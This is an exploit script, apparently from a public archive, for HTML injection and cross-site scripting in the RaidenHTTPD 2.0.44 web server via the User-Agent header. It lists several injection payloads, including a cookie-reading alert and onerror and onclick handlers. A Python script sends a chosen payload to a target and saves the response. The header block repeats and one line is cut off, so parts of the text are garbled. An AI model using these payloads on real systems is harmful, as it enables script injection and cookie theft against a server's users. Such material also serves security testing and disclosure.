# Exploit Title: RaidenHTTPD 2.0.44 - User-Agent - HTML Injection & Cross-site scripting

# Exploit Author: sultan albalawi

# :@bofheaded

# :https://hackinguyz # Exploit Title: RaidenHTTPD 2.0.44 - User-Agent - HTML Injection & Cross-site scripting

# Exploit Author: sultan albalawi

# :@bofheaded

# :https://hackinguyz.blogspot.com/

#exploit User-Agent HTTP header :

#For remote testing use http-live -There is no need to use the script <<<--------

#Delete or replace User-Agent || Copy and paste this using http_live <<<--------

#exploit 1= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0)hpqoa</title><script >alert(document.cookie)</script >wxo3i
#exploit 2= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0)hpqoa</title><img src =https://scontent-mxp1-1.xx.fbcdn.net/v/t1.0-9/13939522_163400494088381_3386303845241760770_n.jpg?oh=a3b8f974323844875d3e180d678c2366&oe=59D61CAD onerror=prompt[1]>wxo3i
#exploit 3= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0)hpqoa</title><form><input type="button" value="packetstormsecurity" onclick="javascript:window.open('https://packetstormsecurity.com/files/140925/zoomplayer1213-overflow.txt','calculator'+new Date().getTime(),'toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,copyhistory=no,width=450,height=300');"></form>wxo3i
#exploit 4=User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0)hpqoa</title><script>alert('packetstormsecurity')</script>wxo3i
#
#----------------------------------------------------------------------
import requests,sys
def myB():
print "x27x27x27x0dx0ax20x20x20x20x20"
"x20x20x5cx20x20x20x2dx20x20x2dx20"
"x20x2dx20x3cx73x65x72x76x65x72x3e"
"x20x20x2dx20x5cx2dx2dx2dx3cx20x2d"
"x20x2dx20x20x2dx20x2dx20x20x2dx20"
"x20x2ax0dx0ax20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x2ax2a"
"x2ax0dx0ax20x20x20x20x20x20x20x7c"
"x20x20x20x20x44x6fx63x5fx41x74x74"
"x61x63x6bx20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x2ax2ax2ax2a"
"x2ax0dx0ax20x20x20x20x20x20x20x7c"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x2ax2ax2ax2ax2a"
"x2ax2ax0dx0ax20x20x20x20x20x20x20"
"x76x20x20x20x20x20x20x20x20x60x20"
"x60x2ex20x20x20x20x2cx3bx27x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x2ax2ax2ax2ax41x70"
"x50x2ax2ax2ax2ax0dx0ax20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x60x2ex20x20x2cx27x2fx20x2ex27"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x2ax2ax2ax2a"
"x2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0a"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x60x2ex20x58x20"
"x2fx2ex27x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x2ax20x20x20x20x20"
"x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2a"
"x2ax2ax0dx0ax20x20x20x20x20x20x20"
"x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5f"
"x60x20x60x20x28x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x2ax2ax2a"
"x20x20x20x20x20x20x20x20x20x20x7c"
"x0dx0ax20x20x20x20x20x2ex27x20x20"
"x20x20x20x20x20x20x20x20x20x2fx20"
"x20x20x20x27x20x20x20x20x20x20x20"
"x20x20x20x20x20x2ax2ax2ax2ax2ax20"
"x20x20x20x20x20x20x20x20x7cx20x64"
"x61x74x61x62x61x73x65x0dx0ax20x20"
"x20x20x20x3bx53x65x63x75x72x69x74"
"x79x60x20x20x27x20x30x20x20x30x20"
"x27x20x20x20x20x20x20x20x20x20x2a"
"x2ax2ax4ex45x54x2ax2ax2ax20x20x20"
"x20x20x20x20x7cx0dx0ax20x20x20x20"
"x2cx20x20x20x20x20x20x20x2cx20x20"
"x20x20x27x20x20x7cx20x20x27x20x20"
"x20x20x20x20x20x20x20x20x2ax2ax2a"
"x2ax2ax2ax2ax2ax2ax20x20x20x20x20"
"x20x20x5ex0dx0ax20x2cx2ex20x7cx20"
"x20x20x20x20x20x20x27x20x20x20x20"
"x20x60x2ex5fx2ex27x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x7c"
"x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2d"
"x5ex20x20x20x20x20x20x20x20x20x20"
"x2fx0dx0ax20x3ax20x20x2ex20x60x20"
"x20x3bx20x20x20x60x20x20x60x20x2d"
"x2dx2cx2ex2ex5fx3bx2dx2dx2dx3ex20"
"x20x20x20x20x20x20x20x20x7cx20x20"
"x20x20x20x20x20x27x2ex27x2ex27x5f"
"x5fx5fx5fx5fx5fx5fx5fx20x2ax0dx0a"
"x20x20x27x20x60x20x20x20x20x2cx20"
"x20x20x29x20x20x20x2ex27x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x5ex20x20x20x20x20"
"x20x20x20x7cx5fx7cx20x46x69x72x65"
"x77x61x6cx6cx20x29x0dx0ax20x20x20"
"x20x20x60x2ex5fx20x2cx20x20x27x20"
"x20x20x2fx5fx20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x7cx20x20x20x20x20x20x20x20"
"x20x20x20x20x7cx7cx20x20x20x20x7c"
"x7cx0dx0ax20x20x20x20x20x20x20x20"
"x3bx20x2cx27x27x2dx2cx3bx27x20x60"
"x60x2dx5fx5fx5fx5fx5fx5fx5fx5fx5f"
"x5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0a"
"x20x20x20x20x20x20x20x20x20x60x60"
"x2dx2ex2ex5fx5fx60x60x2dx2dx60x20"
"x20x20x20x20x20x20x69x70x73x20x20"
"x20x20x20x20x20x2dx20x20x20x20x20"
"x20x20x20x20x20x20x5ex20x20x20x20"
"x20x20x20x20x20x20x20x20x2fx0dx0a"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x2dx20x20x20x20"
"x20x20x20x20x27x2ex20x5fx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2ax0dx0ax20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x2dx5fx5fx5fx5fx5f"
"x5fx5fx20x7cx5fx20x20x49x50x53x20"
"x20x20x20x20x29x0dx0ax20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x7cx7cx20x20x20x20"
"x20x7cx7cx0dx0ax20x20x20x20x20x20"
"x20x20x20x2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx0d"
"x0ax20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x53x75x6cx74x61x6ex20"
"x41x6cx62x61x6cx61x77x69x0dx0ax20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x68x74x74x70x73"
"x3ax2fx2fx77x77x77x2ex66x61x63x65"
"x62x6fx6fx6bx2ex63x6fx6dx2fx70x65"
"x6ex74x65x73x74x33x0dx0ax20x20x20"
"x20x20x20x20x20x20x20x20x20x20x20"
"x20x20x20x20x20x20x20x20x20x20x61"
"x6cx62x61x6cx61x77x69x34x70x65x6e"
"x74x65x73x74x40x67x6dx61x69x6cx2e"
"x63x6fx6dx0dx0ax20x20x20x20x20x20"
"x20x20x20x2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx0d"
" x68x74x74x70x73x3ax2fx2fx70x61"
"x63x6bx65x74x73x74x6fx72x6dx73x65x63"
"x75x72x69x74x79x2ex63x6fx6dx2fx66x69"
"x6cx65x73x2fx61x75x74x68x6fx72x2fx31x32x35x38x36x2f "
"x20x20x20x2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
"x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx0d"
if len(sys.argv) < 2:
print 'ie: python ' + sys.argv[0] + ' <http://site.com:8080 > <or http://site.com> '
sys.exit(1)

pyload = ['''<form><input type="button" value="packetstormsecurity" onclick="javascript:window.open('https://packetstormsecurity.com/files/140925/zoomplayer1213-overflow.txt','calculator'+new Date().getTime(),'toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=yes,copyhistory=no,width=450,height=300');"></form>wxo3i''',
"<script >alert(document.cookie)</script >",
"<img src =https://scontent-mxp1-1.xx.fbcdn.net/v/t1.0-9/13939522_163400494088381_3386303845241760770_n.jpg?oh=a3b8f974323844875d3e180d678c2366&oe=59D61CAD onerror=prompt[1]>",
"<script>alert(packetstormsecurity)</script>",
"<img src="blah.jpg" onerror="alert('XSS')"/>"]
myB()
print " "
url = sys.argv[1]+'/raiden-icons/?jt_mtime=d'
print " "
print "target host: --> {}".format(url)
print " "
print "-"*50
print" 0 "+pyload[0]+" "
print" 1 "+pyload[1]+" "
print" 2 "+pyload[2]+" "
print" 3 "+pyload[3]+" "
print" 4 "+pyload[4]+" "
print " "+"-"*50
print " "
while True:
print " "
print " "
num=pyload[input('exploit number : ')]
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0)hpqoa</title>'+num+'wxo3i'}
response = requests.get(url, headers=headers)
print(response.content)
file=open("RaidenHTTPD-2.0.44.html",'w')
file.write(response.content)
file.close()
print " "+"="*50
print " "
print " "
print 'file exploit created --> [ RaidenHTTPD-2.0.44.html ]'